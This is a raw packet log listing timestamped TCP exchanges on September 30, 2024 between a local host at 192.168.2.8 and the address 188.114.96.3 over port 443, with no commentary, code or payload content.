Sep 30, 2024 18:25:29.872487068 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.872530937 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.872567892 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.872579098 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.872603893 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.872621059 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.873672009 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.873691082 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.873733997 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.873742104 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.873764992 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.873785019 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.874214888 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.874228954 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.874278069 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.874284029 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.874321938 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.875416040 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.875432014 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.875489950 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.875499010 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.875535011 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.876547098 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.876563072 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.876643896 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.876652002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.876702070 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.877067089 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.877080917 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.877134085 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.877145052 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.877218008 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.877218008 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.877418995 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.877433062 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.877459049 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.877466917 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.877496004 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.877516985 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.962657928 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.962686062 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.962753057 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.962800980 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.962822914 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.962836981 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.962843895 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.962858915 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.962876081 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.962882042 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.962910891 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.965747118 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.965768099 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.965818882 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.965826988 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.966020107 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.966038942 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.966073990 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.966079950 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.966106892 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.966274977 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.966290951 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.966351986 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.966356993 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.966372967 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.966784954 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.966841936 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.966846943 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.967031002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.967086077 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.967091084 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.968291044 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.968305111 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.968352079 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:29.968358040 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:29.968394995 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.049288034 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.049312115 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.049377918 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.049398899 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.049443960 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.050193071 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.050208092 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.050263882 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.050271034 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.050309896 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.051218033 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.051230907 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.051281929 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.051289082 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.051326036 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.051840067 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.051856995 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.051915884 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.051923037 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.051959038 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.052283049 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.052299023 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.052347898 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.052355051 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.052393913 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.052687883 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.052702904 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.052747011 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.052755117 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.052793026 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.053062916 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.053077936 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.053122044 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.053129911 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.053167105 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.053514004 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.053529024 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.053577900 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.053584099 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.053622961 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.137379885 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.137408018 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.137468100 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.137490034 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.137516022 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.137542009 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.138195038 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.138212919 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.138268948 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.138274908 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.138317108 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.139240980 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.139259100 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.139421940 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.139429092 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.139472008 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.139700890 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.139715910 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.139770031 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.139775991 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.139816046 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.140132904 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.140147924 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.140203953 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.140212059 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.140255928 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.140600920 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.140615940 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.140675068 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.140681028 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.140717983 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.141000032 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.141016006 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.141115904 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.141122103 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.141160965 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.141521931 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.141537905 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.141597986 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.141603947 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.141648054 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.225116968 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.225147009 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.225191116 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.225213051 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.225229979 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.225241899 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.226511002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.226528883 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.226583004 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.226588964 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.226624966 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.226965904 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.226980925 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.227030993 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.227035999 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.227070093 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.227359056 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.227374077 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.227422953 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.227427959 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.227463007 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.227914095 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.227930069 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.227982998 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.227988958 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.228024006 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.228296041 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.228313923 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.228358030 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.228363991 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.228385925 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.228405952 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.228760004 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.228775978 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.228833914 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.228837967 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.228877068 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.229329109 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.229348898 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.229403973 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.229409933 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.229530096 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.314229012 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.314256907 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.314313889 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.314328909 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.314351082 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.314368963 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.314711094 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.314728975 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.314759016 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.314764977 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.314790964 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.314809084 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.315279007 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.315296888 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.315330029 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.315335035 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.315355062 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.315373898 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.315803051 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.315818071 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.315854073 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.315860033 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.315880060 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.315901041 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.316416025 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.316431046 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.316468954 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.316474915 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.316494942 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.316517115 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.317217112 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.317234993 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.317269087 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.317276001 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.317296982 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.317320108 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.317785025 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.317799091 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.317832947 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.317838907 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.317858934 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.317881107 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.318216085 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.318229914 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.318260908 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.318267107 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.318289042 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.318305969 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.401894093 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.401922941 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.402024031 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.402040958 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.402091980 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.402386904 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.402406931 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.402435064 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.402442932 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.402476072 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.402484894 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.402882099 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.402904034 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.402930975 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.402936935 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.402957916 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.402981043 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.403392076 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.403409958 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.403455019 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.403460979 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.403496981 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.403743029 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.403759003 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.403788090 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.403794050 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.403825045 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.403886080 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.404758930 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.404778957 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.404808998 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.404815912 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.404836893 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.404851913 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.405760050 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.405782938 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.405812025 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.405817986 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.405838013 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.405863047 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.406121016 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.406137943 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.406169891 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.406176090 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.406198025 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.406217098 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.490417957 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.490452051 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.490530014 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.490555048 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.490600109 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.490660906 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.490681887 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.490720987 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.490727901 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.490760088 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.491123915 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.491146088 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.491194963 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.491202116 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.491235018 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.491709948 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.491729975 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.491770029 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.491775990 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.491816044 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.492060900 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.492075920 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.492108107 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.492115021 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.492131948 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.492155075 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.492619038 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.492636919 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.492681980 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.492688894 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.492722034 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.494283915 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.494302034 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.494370937 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.494379997 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.494419098 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.494705915 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.494724035 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.494766951 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:30.494774103 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:30.494810104 CEST	49706	443	192.168.2.8	188.114.96.3
